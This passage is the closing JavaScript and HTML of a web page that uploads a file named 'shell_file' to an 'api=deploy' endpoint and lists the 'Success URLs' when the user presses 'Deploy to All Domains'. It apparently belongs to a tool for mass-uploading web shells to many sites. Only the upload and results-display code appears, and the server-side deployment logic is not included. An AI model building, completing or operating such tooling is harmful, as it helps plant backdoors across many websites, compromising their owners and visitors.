formData.append('shell_file', fileInput.files[0]);
deployBtn.disabled = true;
deployBtn.textContent = 'Deploying...';
resultsDiv.innerHTML = '<div class="loading">Processing...</div>';
fetch('?api=deploy', {
method: 'POST',
body: formData
})
.then(response => response.json())
.then(data => {
resultsDiv.innerHTML = '<div class="results"><pre>' + JSON.stringify(data, null, 2) + '</pre></div>';
if (data.status === 'success' && data.results) {
const successUrls = data.results
.filter(r => r.status === 'success')
.map(r => r.url);
if (successUrls.length > 0) {
resultsDiv.innerHTML += '<div class="results"><h3 class="success">Success URLs:</h3><pre>' + successUrls.join('\n') + '</pre></div>';
}
}
deployBtn.disabled = false;
deployBtn.textContent = 'Deploy to All Domains';
})
.catch(error => {
resultsDiv.innerHTML = '<div class="results error">Error: ' + error.message + '</div>';
deployBtn.disabled = false;
deployBtn.textContent = 'Deploy to All Domains';
});
});
</script>
</body>
</html>